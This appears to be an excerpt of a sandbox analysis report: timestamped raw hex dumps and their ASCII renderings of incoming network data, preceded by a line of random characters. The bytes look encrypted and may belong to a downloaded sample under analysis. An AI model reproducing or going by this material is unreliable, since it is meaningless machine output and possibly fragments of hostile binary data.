Q7)`8{i/ZI$OZro4AaG7N\|7"'<yIEXQw\|\%{d7qZedNrWR<E@5o[;/1\8FK16kNK{f-ZG-\
2021-10-13 13:47:09 UTC	54	IN	Data Raw: 9a f6 b5 f9 3c 04 69 12 f5 bb ba 26 9c bb 6b 67 73 6b ab be e1 32 c8 f1 52 8a 2d cf 60 94 70 38 c0 ce 78 b1 3a 36 08 8a b2 2f 09 8b 62 53 4c a9 ef 80 44 c9 de a7 4b 80 5c 6d 59 e1 f1 f9 ed aa 2e 0e 17 65 cd 9a 08 fe 3d 2e b9 f3 f9 b7 41 89 7f fc db 9d 77 c5 06 5f 07 c4 13 0a ec cf d0 95 04 16 37 8e 9a db 89 ea 99 f3 31 e1 05 33 89 29 9c 76 cd fa b5 1f 85 76 71 f4 ae 2f 53 37 b2 f9 49 e3 61 d5 fe 31 7b 95 6a dd 06 0c 43 3c 8b 13 67 a6 56 2f 0b 4f c7 d8 4f 88 55 68 aa 74 17 b6 1c af e4 73 52 60 c2 9e 7a 4f e2 92 38 99 23 e3 b6 5e 93 e6 28 1d ec 01 3d d3 e3 2e a5 4b 6e 58 5b 30 0d a8 3d c6 a5 68 90 93 f8 7d 44 c7 35 af 94 16 0f 85 19 8b 06 85 d2 28 f2 03 79 51 ea 65 5b 7a 74 de b3 de 12 2e 63 0f 0c 3f 50 2b 50 30 2e c8 41 99 b5 2e 02 db cf 4e 89 9e e6 64 7b Data Ascii: <i&kgsk2R-`p8x:6/bSLDK\mY.e=.Aw_713)vvq/S7Ia1{jC<gV/OOUhtsR`zO8#^(=.KnX[0=h}D5(yQe[zt.c?P+P0.A.Nd{
2021-10-13 13:47:09 UTC	55	IN	Data Raw: 94 84 e8 e0 37 e0 d9 0f ac 52 a3 c0 7f ed 20 44 29 a8 ec af 9d c1 26 02 60 fd 2b 82 f2 b9 38 ba 53 d0 28 2f a4 87 b0 05 40 09 cb 87 71 55 c5 c1 7d 97 bc 34 24 5f 82 8b e4 c8 7f 78 3c 6b dd 97 73 1a 29 54 8f 0b 32 66 b0 2e dd 64 8b a3 d1 f2 f3 a1 e3 c8 0e 90 98 70 db 4b a9 d2 57 f4 b3 2c 04 b0 2a 87 42 b7 f3 aa 51 48 6e f4 f2 c2 ae 04 00 2d bc a6 f1 38 48 01 b1 ff 9f d1 a2 f8 91 c6 85 87 e1 44 39 ba c2 b6 d7 9d cd cf b6 ae 22 b8 11 9b 44 1b 35 0c 3f 4a 3d 42 b4 6e c9 5e 85 96 e6 6a d7 3c e4 fa 1d 1a c2 1f 69 eb ab 65 94 21 1b 73 38 c0 be 5d a6 11 0c ef 5b a6 00 5d 7d 5d d7 81 21 c6 58 21 ae 9e 9d 5c c9 e2 cf b1 f3 5b 02 58 6b 58 68 e7 7e 61 53 85 a3 e9 e4 ba f8 2c 00 78 b4 78 bf e3 24 37 f0 de 15 72 29 69 fc cd a9 3b f6 5f 08 cb a3 df 06 53 84 96 56 8d ac Data Ascii: 7R D)&`+8S(/@qU}4$_x<ks)T2f.dpKW,*BQHn-8HD9"D5?J=Bn^j<ie!s8][]}]!X!\[XkXh~aS,xx$7r)i;_SV
2021-10-13 13:47:09 UTC	56	IN	Data Raw: 57 e4 b9 13 78 ea b3 55 b2 b1 72 3e 42 78 db 7d e1 13 28 97 88 2f 34 a6 43 ac 4a 8b f6 dd c5 5a 4b c9 1e ed 37 5b e3 bc 98 86 96 26 47 76 ba ba 5a 4f 32 e0 0e 64 b2 fc aa bd 6d cc d2 d9 7d 3f f9 09 95 b1 6a 21 c2 10 40 83 94 73 0e b7 6e 67 d8 61 eb 09 f0 58 83 71 d0 8b c0 bf 35 73 f7 1e 35 1c c1 6e 33 fc 16 bf 88 fd 5e 28 ba cc 58 12 0c 94 d0 b8 43 12 7a b0 ef 9f b2 43 f1 e8 83 fb 07 b5 8c b3 2c 46 45 2e 67 03 33 18 6f dd 86 58 68 bf 62 41 6f f9 94 c1 dc bc 22 a2 11 d9 8d 90 d5 c8 1d 5f c4 12 ed 76 4e 4d 5f a5 b3 08 58 4e 28 ca 53 f3 9b fc 83 50 51 cd 43 f9 28 d6 5b f2 d1 32 43 f3 8b a8 01 0f 41 c4 28 42 2f 4d 53 c8 17 b1 2f fa d3 ec e1 83 1b 43 72 9a 67 e7 19 f4 ac d5 c1 c0 57 a8 28 bb 31 f2 af a6 cf 85 41 67 3e 4c f3 84 a4 6b c4 9f ce 5a 33 f2 1c 33 27 Data Ascii: WxUr>Bx}(/4CJZK7[&GvZO2dm}?j!@sngaXq5s5n3^(XCzC,FE.g3oXhbAo"_vNM_XN(SPQC([2CA(B/MS/CrgW(1Ag>LkZ33'
2021-10-13 13:47:09 UTC	57	IN	Data Raw: 2d 7b 43 79 0e 8f 17 6b 05 6c 51 0a bf 76 f9 fd 0b ab 78 d7 89 c8 ef d0 a7 b1 90 95 e2 b5 c3 55 a0 09 b3 4a a9 32 5e 19 d7 35 cf ae 7f 8a 11 67 ee 8c d7 3c 41 93 8f 75 41 c7 75 2e 71 bc 32 9c 39 43 0a 6c f5 87 c2 05 08 6a 2f e1 58 bc 68 1a c2 2c e1 cf 84 a9 78 b9 64 aa db 09 8b 72 57 e5 a5 f2 03 ff db 77 0d 84 70 b8 69 9f 9f 46 65 2e bb 76 d1 2a 1a 9b 46 ba 39 51 25 66 50 30 29 c4 ad f8 46 37 bb 9d 04 0b a7 8d 3d 4d e1 05 77 08 91 c8 fd 4b 5e 51 16 31 1c 71 1d 6a 6f 81 1f b2 83 7a 23 55 60 4d e5 fd aa cf 8f 2d 81 16 4f 57 dd 6f 2b 13 8b 31 25 b9 89 48 37 99 80 d7 74 9c 89 a1 ab 3b bd 12 60 db 54 7a 4f ea c0 bc a6 e3 66 19 3b 0b 4c 77 11 f3 ca 47 5a 68 cb 7b 4c e8 ec 92 d3 b0 57 ad 47 49 b8 1b 15 5c 22 cf 9a 53 f8 cd e9 6c 12 ca 76 74 01 17 ab 36 1f aa e0 Data Ascii: -{CyklQvxUJ2^5g<AuAu.q29Clj/Xh,xdrWwpiFe.v*F9Q%fP0)F7=MwK^Q1qjoz#U`M-OWo+1%H7t;`TzOf;LwGZh{LWGI\"Slvt6
2021-10-13 13:47:09 UTC	59	IN	Data Raw: 4f 53 1d d8 d0 00 c3 9e b3 8e 52 6c 81 d0 5c 76 c0 8a 37 c7 57 5f cd de 54 fc 00 86 8e 92 a1 1a b8 cb b8 82 f0 bf 66 c5 9e 62 52 5c 9a 98 fd 23 80 2d 43 5b 28 0b cb 01 e7 29 20 55 24 33 fc c4 bb 16 e4 df 2c d6 e8 21 01 b9 c6 c7 6d 58 3f a0 ac 2a 5e 50 48 5c da f8 05 2a cb 2a b8 a0 fc 09 31 a5 1f fe ab 64 87 81 ec c2 d4 d1 e1 7d 5c 66 cb 7a 51 1e 5d e3 3f a2 a4 40 5b 10 5f 9b f4 b1 1b aa e4 51 f4 0d 44 a1 fc d3 15 c3 03 2a 2b 7a 0e 45 a4 41 4d 3a 5b 5c 75 48 2a 15 ed 2f 7d 31 6c 29 87 60 9a 57 f3 98 b6 d7 49 63 17 2f 7d cf 47 9f 3c b4 0b aa 6d f4 b2 7c 4c 59 f6 cb 0d 0e 99 7b b4 7c 4b e8 ad 38 9e d9 14 63 62 2d fb 10 e1 3b ae d1 c8 a3 a0 59 84 cf 7c ab 87 1a 28 64 5c d3 3f 2d e0 a5 de d2 d9 51 7b ba a3 bd c8 d4 5e 02 58 33 89 7a f0 78 60 27 bc 76 34 03 0f Data Ascii: OSRl\v7W_TfbR\#-C[() U$3,!mX?^PH\1d}\fzQ]?@[_QD+zEAM:[\uH*/}1l)`WIc/}G<m\|LY{\|K8cb-;Y\|(d\?-Q{^X3zx`'v4
2021-10-13 13:47:09 UTC	60	IN	Data Raw: 80 02 5f dd 75 b5 7a 85 d2 28 48 07 fc 85 1a 53 d9 07 7c 5d b9 dc 91 5c 53 07 79 27 d3 d5 96 10 5a d5 2d 4f 42 2e 02 d1 c1 69 4e 17 ba dc 7b 56 e8 9a 90 ff 68 d5 fd 36 56 90 53 36 78 5f 25 37 21 54 99 f6 09 6c 25 d3 05 cb 02 40 26 2d 76 b4 53 82 e3 3d 64 a4 ed 3e b9 38 7f 1f b6 ad ab 07 38 6e f6 3a 27 07 3f e7 ef bf 0e f1 68 35 48 91 69 91 09 45 1e bc ea 85 20 82 62 12 bf 35 98 eb a6 8f 1b c3 c3 41 c9 0a 61 e7 b4 34 d7 45 1f 11 83 71 a9 20 c3 9e fa 7b 6a 87 b4 6e ec f9 28 83 91 6f e1 de 5b f6 76 ad ee 31 c7 27 fb 29 f3 00 cb 4a 25 9c d7 9c 83 d9 20 21 c8 9b 59 a8 53 d5 3a 7b e8 1d b7 a7 a0 e5 fb 86 a5 0f 2a ad cd 84 71 d3 07 ac a2 c8 fc 1a 40 51 cd 9d 8e 03 4e 5b f2 0f 8e 9f 39 d9 25 84 e3 1b 49 bf e1 77 a5 1a 4e 45 59 70 fb 9b 2b 30 aa f7 af 22 cd 8f 96 Data Ascii: _uz(HS\|]\Sy'Z-OB.iN{Vh6VS6x_%7!Tl%@&-vS=d>88n:'?h5HiE b5Aa4Eq {jn(o[v1')J% !YS:{*q@QN[9%IwNEYp+0"
2021-10-13 13:47:09 UTC	61	IN	Data Raw: 50 0e d4 0f 96 0f 87 14 2a 02 23 6f 5c 0f 76 58 88 bc b8 95 80 13 aa 39 a1 8f 98 8d f5 1e 8d ea c5 68 a0 e6 06 c9 e5 3f ba 97 a4 4f 3b e3 8b 85 c6 77 78 50 cc 03 45 aa a3 33 34 82 67 e8 54 26 5e 8b 0d 36 c7 24 b4 67 f6 ad a6 ea 01 69 cb 10 f2 11 0e 33 97 41 1e 51 1c 77 52 8a 81 4d 5b fa e5 3c be f5 93 60 92 6c ef 46 a6 d0 f6 00 8d 64 e7 be 17 7e 80 d5 6e ea e0 08 f8 6c 09 8b 78 16 b5 06 86 19 9b 86 19 9d 62 c2 1f bc ea 95 6a c0 41 89 9e 58 f2 14 13 3a a9 ca 57 ff 45 b0 b2 ec b6 17 87 d2 4d 38 5a 2a c7 e2 71 b6 4f 6a 8b c4 46 69 cc 97 49 0e e8 92 10 78 8e 61 51 2d 52 37 ac 4d b6 1c 88 2f bc 33 c6 72 b9 88 75 88 6c b6 05 b7 e0 e3 d2 f4 ec 13 50 27 e1 54 28 6c 2a 8b e8 8c d6 7c 09 c9 15 77 02 b0 2a 19 81 8e 3b 95 23 68 6b 6c 6e 73 d7 c4 2e b5 ff 51 1c 7f 74 Data Ascii: P#o\vX9h?O;wxPE34gT&^6$gi3AQwRM[<`lFd~nlxbjAX:WEM8ZqOjFiIxaQ-R7M/3rulP'T(l\|w;#hklns.Qt
2021-10-13 13:47:09 UTC	63	IN	Data Raw: d7 b1 ac b5 9c a0 2b 2f e2 29 72 f0 67 b1 48 47 a8 4c 99 cb dc ff b9 28 ba 65 af dc 0f d3 1f df 3f 38 cf e2 7c d8 21 b6 3b 5a 33 2f d4 ba 7f 0a eb a9 79 f7 98 57 b5 1b 48 d1 20 9a 7b 1b 6d a4 19 97 d3 5b 82 f0 3c a2 0d 6e f2 61 9c 4a 4e 08 fd 87 e5 9b 44 81 7a da 6e 18 a0 75 fe 24 9b 32 45 21 58 e3 4c 67 a4 ed f1 77 27 d8 c3 07 71 03 c5 83 f9 1f a2 bd 19 5b 0e 8e a0 76 d1 69 05 c4 3f a0 08 e2 29 43 6d cf f4 e0 c2 d4 d5 0e 8a 42 5d 10 17 5d 5d a2 1c e4 17 f3 0d 9f 14 5f 5b b3 db 42 27 71 f0 5a 1a 53 4a 55 c4 7b c8 80 ee b8 3d 21 f2 b8 71 f4 6b 69 3b 75 fb 3c a7 81 c3 95 a4 57 93 a4 30 44 fa df 75 f3 36 4b d6 71 62 28 a3 38 ae e8 59 c7 fb 11 34 e3 de 06 8c ce a1 79 7a bb 31 79 e4 1b 8d cc 05 75 8e 19 dd 0f 2d 20 d6 9f 92 bb 44 a9 c4 9b 2f 3e 86 31 f6 cc bc Data Ascii: +/)rgHGL(e?8\|!;Z3/yWH {m[<naJNDznu$2E!XLgw'q[vi?)CmB]]]_[B'qZSJU{=!qki;u<W0Du6Kqb(8Y4yz1yu- D/>1
2021-10-13 13:47:09 UTC	64	IN	Data Raw: 1f 80 bd 9b 01 ae 27 f3 e9 02 f9 b3 c6 3c 31 22 32 92 33 19 57 04 3e f7 b5 97 25 34 39 44 c7 0e 47 f8 a8 5f d2 7a 2a 27 8e d2 ab b5 db ec 0f 5e 35 ce 61 ff e6 c7 b5 81 de 59 67 30 27 d3 07 b8 d8 6c 64 a9 b1 c1 ea 0a d1 c2 b9 4e 6c 6c a3 2d 46 65 9f 86 9f 68 da 29 23 84 13 97 b1 83 b3 50 27 28 f1 29 a6 82 aa 57 6e 48 54 d7 1b 73 c1 24 61 7d e5 0b f1 1a 97 12 b5 f7 4a c3 56 2b 7f 85 73 92 14 a4 82 13 3b 13 18 9b 0d 1e 94 cf b2 4a 12 20 18 43 39 d9 43 09 c6 61 65 52 2b 41 ca ea 21 d4 43 24 67 1a 29 cb d5 fe c3 04 7f c4 3b 70 e5 9e f4 69 7c 74 d2 ac 2c 59 3d f5 5d 55 98 93 0a be ba 38 c8 6a a5 50 70 88 3b 46 d2 fa 2a 54 d7 86 bb b9 e9 6d 6f 56 df 11 f4 41 1a 18 ab 08 12 31 7f 0f 58 5b c6 ca 84 76 04 4c af c9 e3 85 d5 71 50 e5 52 5d 37 57 e2 f0 51 0a 95 c5 9d Data Ascii: '<1"23W>%49DG_z'^5aYg0'ldNll-Feh)#P'()WnHTs$a}JV+s;J C9CaeR+A!C$g);pi\|t,Y=]U8jPp;FTmoVA1X[vLqPR]7WQ
2021-10-13 13:47:09 UTC	65	IN	Data Raw: 21 73 da 96 20 81 0b f1 93 ca a1 b3 02 59 99 65 89 fa df c9 5e b1 53 df 75 71 48 4c 73 4d 61 44 08 55 b0 00 a5 c1 f0 04 5b a0 2c 7f 87 7e 36 f8 2c 00 78 b0 a2 c7 ed aa 39 f1 80 9e fd 70 27 b0 6a f5 23 a3 85 69 09 6e 4a 31 05 6c d7 0b bf 76 79 f9 77 78 50 e5 70 45 aa ab b2 30 b7 39 e3 89 2b 6d fe 67 09 1c 41 49 2e 09 52 76 7f 95 92 4c 91 4b 10 ba a3 44 17 f6 3d 2d 13 ad cc 22 27 7b 77 f3 fc 47 6c e5 3e 84 6c ef dd de 2f 09 31 22 68 1a 41 6b 39 40 af dc 3d a9 d2 01 ae ce f3 64 ce 77 ad 2c 6d 4e 4e 46 ef 6a 95 3d 4d d3 af 12 cb 42 49 a4 3c 97 78 c6 c5 56 be 42 a2 79 58 eb 71 a1 e5 b2 16 5d e5 24 c5 78 e2 71 b6 30 f1 86 74 51 0f 4f 81 0d a0 e5 6b 9d 7a f2 a1 f2 0b 16 89 23 f9 fd e3 0b 52 f4 b8 3e 21 01 b7 7e 6a ca bb 43 dd 6b f1 00 97 b9 fa ad d8 9d 1b b1 6b Data Ascii: !s Ye^SuqHLsMaDU[,~6,x9p'j#inJ1lvywxPpE09+mgAI.RvLKD=-"'{wGl>l/1"hAk9@=dw,mNNFj=MBI<xVByXq]$xq0tQOkz#R>!~jCkk
2021-10-13 13:47:09 UTC	66	IN	Data Raw: 57 29 c2 b7 bc 2a 41 51 cb c7 3e f0 2a 37 4a a4 73 91 d6 fb f4 c9 84 f2 8e 01 5a 57 cb 6b 14 92 18 59 a2 b7 3f 4e 35 18 3f 62 29 44 36 0f d2 86 7b 37 a0 d4 6b fb e8 ad 39 44 1f b4 be cd 2d a9 10 e5 0b a1 d8 7b 0a b8 fb b8 26 c7 3e 87 03 a1 82 f5 ee d7 99 c2 60 71 51 1d 6b d5 14 dd 3f cb 59 d7 5a a7 c3 f4 6f 87 1a 47 50 85 d7 87 a1 35 f8 2c d3 31 2d a4 80 13 55 6b 7c 5b cc e4 d2 1b 22 fd 8e 94 f6 0e 08 d2 3d c1 c6 ac d5 2c 63 0e 76 7a ba e3 0e 83 57 b4 6e 27 bb f7 3c dd 39 38 8a d3 69 48 35 84 cf 71 4f 65 f6 02 1d 55 3b f4 cf 60 80 36 18 28 a9 10 f6 68 28 13 ad f6 ba 37 40 8f 07 e3 29 75 e1 a7 9b c7 f8 f7 00 2f 5b 4d 8d 30 e7 be 17 fd ac 8d fa 29 ef e6 23 e0 8c 52 0c 6c 12 91 79 b6 64 9d 15 67 9d 3d 6b 4d 4c b4 12 cb 2b f6 79 e7 26 6f 88 3a 3c 35 56 68 96 Data Ascii: W)AQ>7JsZWkY?N5?b)D6{7k9D-{&>`qQk?YZoGP5,1-Uk\|["=,cvzWn'<98iH5qOeU;`6(h(7@)u/[M0)#Rlydg=kML+y&o:<5Vh
2021-10-13 13:47:09 UTC	67	IN	Data Raw: d1 f5 b4 82 08 cc 47 06 28 38 b8 12 ba b0 20 bd 7c ab 39 59 72 4b d3 ea 2e 2a a6 88 cb b5 2a 4f 84 0b 3e 57 fc 9d 10 3d 19 20 2e 10 8e b5 c6 fe 12 7c fc 0c 15 3c ea 3e aa 4d 3a 06 dd 01 1d 7a 2a e0 5e 40 a4 f4 20 08 48 85 51 9e 46 f9 76 a4 5b f2 df a2 53 ae 87 7e 0c c6 16 07 8a cf 4f b9 f8 7c 34 bc 40 d0 26 7e ed cb 33 af 72 9e 67 e7 2a 6f 74 05 ce f8 85 c2 d3 1d cc f2 ec 91 7a 4e c8 22 f8 b1 8a 28 ae 16 0a 62 bd e2 ba e7 47 f7 6a 86 65 4e fc 29 11 99 58 19 58 3f f8 b5 91 f8 28 1c c2 3a 7c cd c7 06 36 23 d7 57 25 17 a2 43 48 68 a2 b9 d6 31 fc a4 ab 50 77 55 40 13 24 e7 cc 44 c7 ce 3d 5a 8e 2f a4 de 68 92 6e b0 cb 07 20 d8 36 46 40 1c 50 e5 b9 97 7d 8e 9b cc da e6 53 07 5b 66 7e da 41 55 65 0c f4 b0 cc 9d 5f 99 74 d7 16 20 76 24 63 5f e3 90 a2 f3 24 5b 10 Data Ascii: G(8 \|9YrK.*O>W= .\|<>M:z^@ HQFv[S~O\|4@&~3rg*otzN"(bGjeN)XX?(:\|6#W%CHh1PwU@$D=Z/hn 6F@P}S[f~AUe_t v$c_$[
2021-10-13 13:47:09 UTC	68	IN	Data Raw: 10 35 f1 77 17 77 91 03 b7 d3 f5 73 c0 98 25 b7 aa cc 10 fa e9 a2 e4 9c ba ee 11 8e c2 ce 25 0d 3d c0 c1 30 02 b4 0f 34 8a 7d e2 8e 61 fc 80 d7 56 8e 78 ca 1b f4 9f eb 33 63 35 0f 17 5e 0c b5 32 ad 4b 94 59 46 0b 7b c4 e8 c0 95 92 ad 64 84 25 9a 49 89 05 92 c9 b8 df 05 0a 9a b2 96 fb 1f 51 3b 68 ab c8 1e 09 80 b3 44 16 52 ff 1c 7b 2e 0a e2 47 d2 ed b0 20 13 39 f0 c0 44 4b 6f b1 1f 4c ba f2 3d 88 88 32 e2 ed 3d 31 52 2c 28 9a a9 01 72 c0 34 f7 71 de c7 96 a2 93 bd 71 28 aa 5e 54 17 cf a5 8b cf 38 c7 2e fd ad 40 a5 70 bd 3e 28 48 84 82 67 bc 5a ed 98 87 23 a9 c0 35 3c 93 33 db c7 5a 5c bf 53 09 ef 68 23 6f fe d6 1b ab eb 88 c8 d2 e7 24 b7 20 96 12 c1 b4 52 4a 92 55 09 d1 3c 39 fb 09 82 e5 27 13 18 23 89 66 1b 89 f3 48 c0 69 89 33 48 1e bc d2 44 f4 7a 25 3f Data Ascii: 5wws%%=04}aVx3c5^2KYF{d%IQ;hDR{.G 9DKoL=2=1R,(r4qq(^T8.@p>(HgZ#5<3Z\Sh#o$ RJU<9'#fHi3HDz%?
2021-10-13 13:47:09 UTC	70	IN	Data Raw: 28 67 46 38 e4 13 8d 1c 39 4a 9d 07 16 e4 3a e3 6a 4c b5 ac 0c ad 5e 1a 90 50 aa 3b cb cc 23 29 68 ee 93 45 93 cf df fc 51 18 e9 24 da 7f ef 2f 74 84 7d 2d 87 cf 4e 7b 06 ad 5e cf 62 93 94 66 38 b2 e3 03 fa 9d 4e be 63 78 b6 2e 01 99 f7 8c f5 5e 46 7b d0 a7 b6 17 fc 81 fa eb 5c 61 ef b9 ec 7f da e4 01 05 e4 85 0f 4e 92 d3 b8 b3 89 a7 4d 2a e2 54 75 c9 2a 26 1a 41 1e 99 18 c1 a7 2c cf 2b a5 55 08 d4 b6 9c 0f 87 12 20 3f c4 94 a3 7b 7b e8 87 ed 50 40 e0 ec aa b4 a4 32 47 f0 89 46 72 15 14 ff e6 0d 45 0f 68 7a d5 03 09 49 52 44 89 85 68 cf a0 1a af c2 c6 6e 24 7a a8 98 d5 48 20 3c 51 a0 e9 96 4a a9 3c 1f e5 a9 0a 44 d9 a2 27 fc bb 11 19 54 92 55 41 84 12 f6 f0 b6 ad bc 32 6a 42 97 f6 15 39 b9 2e 6c 8c 7d 66 78 82 f6 00 02 1a 2b e9 ab 13 21 1f b4 10 73 df a9 Data Ascii: (gF89J:jL^P;#)hEQ$/t}-N{^bf8Ncx.^F{\aNMTu&A,+U ?{{P@2GFrEhzIRDhn$zH <QJ<D'TUA2jB9.l}fx+!s
2021-10-13 13:47:09 UTC	71	IN	Data Raw: 48 91 0c b4 ed 45 1e c0 44 9b 2e 34 6f c1 bf 35 15 25 01 95 b9 ff 1a 89 9a 93 f2 7b 7f 7f be be 96 d5 9f a4 3b c7 42 b0 fa 7b e1 69 9b 35 dc dd 12 6b 02 f2 b1 8d 38 61 e9 fc ed 72 55 ba f4 67 bd 85 0b d6 30 df 6d 6f 85 dd 40 7b 1f 65 5c 43 54 12 27 f4 2d 40 74 f8 94 de b6 98 82 ba fa 20 e7 ca 4d 0e e0 e4 98 fd d6 30 69 38 4d d4 c0 36 85 b7 71 b0 56 10 a7 52 50 8b 10 8b 93 40 11 7b a5 1a 4b 71 76 e9 ee 96 21 a0 62 60 43 41 41 ee a2 ca 26 62 84 10 8e 8c 21 e8 a4 cc f2 cf 91 7a 6b c8 22 d5 b0 8a 0d cf 90 5e eb f8 bb 4e b6 12 ba 27 67 f8 c8 3d 55 98 dc ba 1d 50 21 20 9a 7b 1b 6d 98 4b f6 d3 b0 e8 f0 36 3b d5 b8 f1 ae d7 4c dd 87 a0 c9 7c 3e 42 2e fa 64 77 5d 50 fc d0 86 33 ec 28 ba 80 9c a1 fd d1 f4 2a bf 8c 3b 86 17 fa 00 ab 14 ef b4 fe e1 8d f6 a0 84 67 33 Data Ascii: HED.4o5%{;B{i5k8arUg0mo@{e\CT'-@t M0i8M6qVRP@{Kqv!b`CAA&b!zk"^N'g=UP! {mK6;L\|>B.dw]P3(*;g3
2021-10-13 13:47:09 UTC	72	IN	Data Raw: 08 68 1b 41 e8 fd 1b 97 de cc b2 4f 36 6d 63 8f 7c cd 85 a8 2e 0e 5f 8b 32 65 08 c2 e6 28 4d e5 ed 34 10 da 1c 34 e5 91 77 96 db a0 0f 57 ec a7 e9 70 a1 b8 f1 e9 a2 3e 49 5a 35 1d 8e 6e 1d 09 86 2c 4d 69 47 bb 63 d3 f4 e7 d4 91 e4 96 57 80 fb 8d 34 54 ca 27 33 6e 68 b7 bb 8f 82 73 7a 5c c8 f2 fd 3a 26 5a 07 f4 2f 7f c7 27 93 4a 11 ca 28 8b 45 8c a2 28 ee f2 fe 0d 93 ed ff c3 69 04 9c 1e 76 1f 6d 72 bf de d7 9f 38 2d 06 2d 1b 4a 53 f4 c9 31 94 2f e5 57 0c 3a 2e 6e 2f 7f 5c 20 bb 15 d4 e1 ca 9f 1a 22 7a ec 87 ef d3 fb c9 ce 77 df 62 ca 00 8c 3a e6 ad c2 c3 ac 07 84 35 db 58 00 d4 5a 58 8b 20 f4 b6 d1 d0 d1 7b 6d ce 23 3e 5c 52 dd a5 09 65 81 28 8b f2 91 a6 c2 03 3e 43 87 75 6b f4 39 0c fa f7 10 a4 b1 88 42 ee 9e 26 2d 26 60 c5 c8 18 cd 1f eb 29 1a 32 1f bc Data Ascii: hAO6mc\|._2e(M44wWp>IZ5n,MiGcW4T'3nhsz\:&Z/'J(E(ivmr8--JS1/W:.n/\ "zwb:5XZX {m#>\Re(>Cuk9B&-&`)2
2021-10-13 13:47:09 UTC	73	IN	Data Raw: 99 af 2d bb 43 60 6b a7 b5 1f 7d 03 1f ce da f1 1a 8e 0a 8e aa 89 29 ab e7 c8 f0 6d d5 55 a5 99 74 d7 15 10 17 77 6d 5d e3 e2 cf 83 73 a4 ef 82 3f 3e 20 4a 27 f2 65 1d 71 43 e5 a5 b9 42 f7 fc d5 fb e9 2d 09 2e b9 75 83 60 c1 8d 79 2d 82 10 5d aa 4c 14 ae 85 cf 32 ef ea ed 23 d7 c2 f9 94 81 78 c7 3c 93 f8 c0 b1 ef b6 54 f6 07 c1 c9 10 c9 67 0f 46 63 44 a1 b6 17 ff 3f 98 b1 b4 5c 48 2d a9 18 f9 98 3a aa a5 5a 52 22 f9 4c b8 b3 87 25 29 03 87 c1 37 99 79 4d 2c c2 1d 59 c3 b4 a1 04 3c 51 a5 76 11 b1 46 de 5e 6f af 3f 7a 28 e2 09 44 75 50 84 bf ea aa 97 3e 39 39 f1 5d d1 14 eb e4 72 95 a8 3b 82 29 d2 b7 f4 ac 39 53 07 00 ba 82 76 7e 39 27 5d af f8 2a 44 39 20 f7 6c 56 bf 3f d4 c3 03 1f 37 e1 69 39 b1 9a 8a 96 e5 ed 61 de c9 12 f2 bd b0 5e d0 c1 15 da 99 fb 40 Data Ascii: -C`k})mUtwm]s?> J'eqCB-.u`y-]L2#x<TgFcD?\H-:ZR"L%)7yM,Y<QvF^o?z(DuP>99]r;)9Sv~9']*D9 lV?7i9a^@
2021-10-13 13:47:09 UTC	75	IN	Data Raw: 78 fe 65 7d 5e ad a2 e0 68 60 73 31 03 a8 47 bd 80 54 73 51 00 fc 6a e1 e8 13 1b d0 41 88 11 81 f3 48 c6 b6 f4 0b 2a e1 43 d7 6b c9 e4 d7 c0 34 bb 11 74 8a 70 e7 fc 90 4a 9e 1c 32 0f 3b f4 a5 ff 4c 85 ce 1c 67 bf 47 12 77 2e ba 6c 5b 7f 8e 35 d0 0d fb 6f b2 4d 30 e8 11 ac 68 ba 09 33 72 e2 f2 7d 5b b5 12 03 f8 90 6c 19 3e 24 cc 90 ad 12 df 5a 64 15 c8 90 e2 4f 98 12 a7 46 c9 50 23 b0 84 d5 b6 5e 78 50 29 f1 9f b3 8d da 8c 14 12 b4 0d 8b cb 09 9e 4c 73 f0 24 87 23 c0 95 3c 12 b8 74 f0 1e d6 e2 21 67 bf a2 23 2b 37 91 7d 14 77 e6 19 af ae 06 89 20 54 23 e8 77 ce 8c a7 96 3b 86 41 67 3d c0 a5 e2 aa 16 7c bb a9 d8 b6 2d 91 7e a2 09 bb 95 51 fb 16 dc ba 93 dd d8 f7 f8 71 71 6d 79 cd 7b 84 44 82 9a bf 31 7d d9 c9 dd 5c 11 92 05 4f c9 29 ce 44 fb ff 3c fe 18 ca Data Ascii: xe}^h`s1GTsQjAH*Ck4tpJ2;LgGw.l[5oM0h3r}[l>$ZdOFP#^xP)Ls$#<t!g#+7}w T#w;Ag=\|-~Qqqmy{D1}\O)D<
2021-10-13 13:47:09 UTC	76	IN	Data Raw: 9e cf be 5b 06 60 f3 56 41 76 6e 55 c1 bc 1f 7e 4d 7b 24 26 b1 04 16 84 41 e6 3a 07 60 d2 ad 41 43 62 68 70 41 bb ab cd 8e 75 c1 8f a8 5c 6d 8a 4f cd 10 d2 fb f0 a1 86 6c 8d 19 1d c6 6b d1 5b 98 6d c3 41 fd c0 e9 00 9d 77 b1 78 b6 78 be 13 2c 93 a4 36 fc 04 62 7f 30 b3 4a cc 96 6d be 32 fd 05 c4 5b ea b3 dd 4b 2a a9 9a 45 68 7d c1 f0 c7 05 df cb 84 12 68 ee b6 6b e7 60 12 42 28 f1 e9 1e 74 f9 e3 7b 99 29 f7 1a 68 24 bd 29 9c e8 bf 3b f5 fb 1c 53 f9 6d 65 d9 48 05 d1 a1 27 6f 06 9c 95 ae 6e ac c9 6c 73 7b 1e 32 74 52 51 1c d1 af 0a 76 cd e6 99 6c 59 19 39 5a c7 92 90 00 8e bb 38 d6 2a 9e e9 a0 2d 78 2c 1f 7a 2d 54 bf 9a 94 75 61 be 51 82 10 21 38 3f 18 d6 a7 f0 87 d8 5a d3 9c cf a5 25 cf 38 c7 66 ff ad 40 a5 22 9e 3e 28 13 50 ea 19 ee 5a ed 98 82 23 a9 a3 Data Ascii: [`VAvnU~M{$&A:`ACbhpAu\mOlk[mAwxx,6b0Jm2[KEh}hk`B(t{)h$);SmeH'onls{2tRQvlY9Z8-x,z-TuaQ!8?Z%8f@">(PZ#
2021-10-13 13:47:09 UTC	77	IN	Data Raw: 19 af ed f2 c9 6f d2 9f 85 11 b5 fe 18 2d 38 5d 23 41 ec e8 63 3d f9 ac 2f a4 66 2f fe 9a b0 cb 6d 71 d8 e6 94 ec b2 47 4c 5a 1e f0 03 32 e3 77 e5 30 2e a3 62 38 4a a2 e5 74 87 81 e8 cc 55 2d 34 e1 20 2d 46 ae 2c b5 be 4e 87 e2 78 8e 5b 9d 97 27 a4 3e 07 f7 20 49 52 7a bb f3 21 bd 4c 02 03 2a c2 be 93 95 af 66 70 eb bf cd 01 3c f4 32 3f f3 10 81 15 d6 78 b3 09 93 01 3c b7 51 ca 99 94 eb 33 c1 54 b6 c6 bc b6 b9 95 97 2d 7b d1 9e f1 b4 05 85 4c f2 36 5c 49 82 ad 3b 43 a1 d9 e4 62 2d 22 dd 31 4a 16 8a a4 81 5d 25 bf 5c bb 73 03 5d 55 77 0a 84 88 97 a1 40 83 92 b9 e2 